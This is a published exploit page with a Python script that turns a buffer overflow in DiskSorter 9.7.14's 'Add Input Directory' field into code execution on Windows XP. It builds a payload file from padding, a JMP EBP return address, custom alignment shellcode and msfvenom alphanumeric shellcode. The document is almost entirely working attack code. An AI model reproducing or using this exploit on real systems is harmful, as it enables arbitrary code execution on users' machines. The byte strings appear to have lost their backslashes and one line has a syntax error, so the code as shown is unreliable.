Home / os / winmobile

Disk Sorter 9.7.14 Input Directory Buffer Overflow

Posted on 13 June 2017

#!/usr/bin/python ############################################################################### # Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow # Date: 10-06-2017 # Exploit Author: abatchy17 -- @abatchy17 # Vulnerable Software: DiskSorter v9.7.14 # Vendor Homepage: http://www.disksorter.com/ # Version: 9.7.14 # Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe # Tested On: Windows XP SP3 # # To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box # # Credit to n3ckD_ for discovering the DoS exploit # # Challenges to convert this DoS to code execution: # 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish) # 2. Buffer at ESP splits string if it contains a "", this is bad since POP ESP is 0x5c # 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory # # +----------------------------------+ # |1 custom shellcode == 1 dead llama| # +----------------------------------+ # ############################################################################## a = open("exploit.txt", "w") # Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False badchars = "x0ax0dx2f" # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0dx2f" buf = "" buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49" buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43" buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b" buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63" buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37" buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55" buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f" buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70" buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c" buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37" buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51" buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32" buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61" buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69" buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d" buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33" buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76" buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47" buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50" buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50" buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f" buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53" buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50" buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30" buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65" buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d" buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a" buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50" buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63" buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54" buf += "x6ex62x45x54x38x62x45x55x50x41x41" jmpebp = "x1fx54x1cx65" # Why JMP EBP? Buffer at ESP is split, bad! llamaleftovers = ( "x55" # push EBP "x58" # pop EAX "x05x55x55x55x55" # add EAX, 0x55555555 "x05x55x55x55x55" # add EAX, 0x55555555 "x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = EBP + 209 "x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode ) junk = "x55" + + "x53x5b" * 105 data = "A"*4096 + jmpebp + "x40x48" * 20 + llamaleftovers + junk + buf a.write(data) a.close()

 

TOP